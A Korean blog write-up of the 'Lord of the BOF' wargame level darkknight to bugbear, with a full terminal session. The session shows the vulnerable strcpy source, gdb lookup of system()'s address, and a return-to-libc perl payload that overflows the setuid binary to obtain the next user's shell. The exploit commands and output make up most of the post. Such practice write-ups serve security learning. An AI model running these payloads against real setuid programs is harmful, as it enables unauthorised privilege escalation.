허헣
rtl풀리니까 기분좋네여. 좀 처음에 헤매긴 했는데 잘되서 기분좋습니다!
login: darkknight
Password:
Last login: Sun Mar 16 07:20:14 from 192.168.10.1
[darkknight@localhost darkknight]$ ls -al
total 44
drwx------ 2 darkknig darkknig 4096 Mar 29 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkknig darkknig 24 Mar 2 2010 .bash_logout
-rw-r--r-- 1 darkknig darkknig 230 Mar 2 2010 .bash_profile
-rw-r--r-- 1 darkknig darkknig 124 Mar 2 2010 .bashrc
-rwxr-xr-x 1 darkknig darkknig 333 Mar 2 2010 .emacs
-rw-r--r-- 1 darkknig darkknig 3394 Mar 2 2010 .screenrc
-rwsr-sr-x 1 bugbear bugbear 12043 Mar 8 2010 bugbear
-rw-r--r-- 1 root root 385 Mar 29 2010 bugbear.c
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf') //이젠 아예 0xbf~주소를 못쓰게 됩니다.
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[darkknight@localhost darkknight]$ cp bugbear bugbeer
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q bugbeer core
Core was generated by `./bugbeer '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/darkknight/bugbeer
Breakpoint 1, 0x8048436 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument
bash: nopx44,: command not found
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`
@AAAABBBB
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`
[darkknight@localhost darkknight]$ ./env ARG
ARG: 0xbffffc9d
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`
@AAAAü ¿
sh: /bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`
@AAAAü ¿
sh: /bin/sh: No such file or directory
Segmentation fault (core dumped) //쵸콤 게싱....해써요..ㅋ
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`
@AAAAü ¿
bash$ exit
exit
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`
@AAAAü ¿
bash$ my-pass
euid = 513
와앙ㅇ와앎ㄴㅇㄹㅁㅇㄴㄹㅋㅋ
'STUDY > Lord of the BOF' 카테고리의 다른 글
| giant->assassin (0) | 2014.04.22 |
|---|---|
| bugbear->giant(1) (0) | 2014.04.16 |
| golem->darkknight (0) | 2014.04.06 |
| skeleton->golem (5) | 2014.03.17 |
| vampire->skeleton (2) | 2014.02.25 |